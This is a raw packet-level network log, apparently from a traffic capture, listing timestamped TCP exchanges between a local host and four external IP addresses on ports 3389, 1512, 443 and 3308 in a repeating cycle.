Jan 12, 2021 07:41:06.390393972 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.390455961 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.480390072 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.480438948 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.480846882 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.486267090 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.540369034 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.605915070 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.659154892 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.659288883 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.660535097 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.713624001 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.720649958 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.720691919 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.720741987 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.720777035 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.734376907 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.788821936 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.789113998 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.800889015 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.801244020 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.854403973 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.854739904 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:06.893210888 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.907901049 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:06.907921076 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:07.011535883 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:07.011574984 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:07.011620998 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:07.011667013 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:07.015912056 CET	49301	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:07.068969965 CET	1512	49301	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:07.131894112 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.184345961 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.184443951 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.185738087 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.237812042 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.252962112 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.253140926 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.262183905 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.316785097 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.317024946 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.326841116 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.327079058 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.379162073 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.379467010 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.431608915 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.431653976 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.550945044 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.550976038 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.551207066 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.556978941 CET	49302	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:07.609348059 CET	443	49302	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:07.666484118 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.709705114 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.709817886 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.711046934 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.754209995 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.764923096 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.764957905 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.765099049 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.780750036 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.826637030 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.826982021 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.838017941 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.838397980 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.881458998 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.881808043 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:07.921899080 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.924809933 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:07.924880981 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:08.037885904 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:08.037919044 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:08.038125992 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:08.040327072 CET	49303	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:08.083389997 CET	3308	49303	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:08.146574974 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.200537920 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.200707912 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.201738119 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.255592108 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.271656990 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.271682978 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.271781921 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.283895969 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.347198009 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.347332001 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.352637053 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.352679968 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.405808926 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.406050920 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.445359945 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.459408998 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.459438086 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.548897028 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.548923969 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.549170017 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.554874897 CET	49304	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:08.608150959 CET	3389	49304	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:08.665066004 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.718058109 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:08.718408108 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.727773905 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.780623913 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:08.787420988 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:08.787446022 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:08.787555933 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.802295923 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.856323004 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:08.856724024 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.866895914 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.867250919 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.919975996 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:08.920273066 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:08.956882000 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:08.973121881 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:09.071217060 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:09.071252108 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:09.071428061 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:09.074419975 CET	49305	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:09.127131939 CET	1512	49305	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:09.192563057 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.244962931 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.245049953 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.245995998 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.298048019 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.305660963 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.305726051 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.312880039 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.366112947 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.366189957 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.371989012 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.372229099 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.424252987 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.424336910 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.476624012 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.595400095 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.595433950 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.595663071 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.598937035 CET	49306	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:09.651138067 CET	443	49306	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:09.706198931 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.749329090 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.749473095 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.750514030 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.793596983 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.804908991 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.804946899 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.805027962 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.815845966 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.860948086 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.861237049 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.872996092 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.873373032 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.916639090 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.916883945 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:09.957168102 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.960228920 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:09.960278988 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:10.073631048 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:10.073669910 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:10.073913097 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:10.077378035 CET	49307	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:10.120737076 CET	3308	49307	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:10.196665049 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.250518084 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.250750065 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.252409935 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.306298018 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.328764915 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.328818083 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.328891993 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.328923941 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.335740089 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.395235062 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.395503998 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.401551962 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.401737928 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.455184937 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.455393076 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.495287895 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.509316921 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.509339094 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.600442886 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.600467920 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.600663900 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.600692987 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.603940010 CET	49308	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:10.657416105 CET	3389	49308	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:10.733326912 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.786513090 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:10.786614895 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.787385941 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.840229988 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:10.847220898 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:10.847239017 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:10.847335100 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.859656096 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.913850069 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:10.914097071 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.920732975 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.921006918 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:10.973887920 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:10.974073887 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:11.013156891 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:11.027347088 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:11.131279945 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:11.131326914 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:11.131567955 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:11.137413025 CET	49309	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:11.190546989 CET	1512	49309	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:11.249747038 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.301985025 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.302144051 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.303769112 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.355875969 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.370776892 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.370899916 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.384929895 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.439662933 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.439927101 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.450666904 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.450982094 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.502969980 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.503176928 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.543301105 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.555242062 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.673994064 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.674037933 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.674088001 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.674129009 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.677983999 CET	49310	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:11.730048895 CET	443	49310	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:11.781461000 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.824911118 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:11.825221062 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.826487064 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.869735003 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:11.881779909 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:11.881818056 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:11.882076979 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.898130894 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.943133116 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:11.943439960 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.954205990 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.954616070 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:11.997692108 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:11.997912884 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:12.037162066 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:12.041014910 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:12.041042089 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:12.153378010 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:12.153470993 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:12.153639078 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:12.156932116 CET	49311	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:12.200073957 CET	3308	49311	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:12.270059109 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.323971987 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.324224949 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.325803041 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.379579067 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.399153948 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.399197102 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.399245024 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.399290085 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.406388998 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.467761993 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.468013048 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.472810030 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.472917080 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.526489019 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.526715040 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.566104889 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.581028938 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.581053972 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.672275066 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.672305107 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.672522068 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.678225994 CET	49312	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:12.732189894 CET	3389	49312	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:12.799112082 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:12.851942062 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:12.852061033 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:12.853334904 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:12.906027079 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:12.912872076 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:12.912894964 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:12.913009882 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:12.926564932 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:12.980458975 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:12.980673075 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:12.985121965 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:12.985272884 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:13.037914991 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:13.038166046 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:13.076956034 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:13.090960979 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:13.195182085 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:13.195204020 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:13.195449114 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:13.198831081 CET	49313	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:13.251629114 CET	1512	49313	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:13.310580969 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.362551928 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.362745047 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.364073038 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.415735960 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.430650949 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.430753946 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.448661089 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.502895117 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.503259897 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.514508963 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.515013933 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.566679955 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.566932917 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.618814945 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.736063004 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.736114025 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.736445904 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.742124081 CET	49314	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:13.793942928 CET	443	49314	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:13.859513998 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:13.902697086 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:13.902766943 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:13.903678894 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:13.946706057 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:13.962265015 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:13.962308884 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:13.962399960 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:13.972721100 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:14.018390894 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.018482924 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:14.022809982 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:14.023160934 CET	49315	3308	192.168.2.22	80.86.91.27
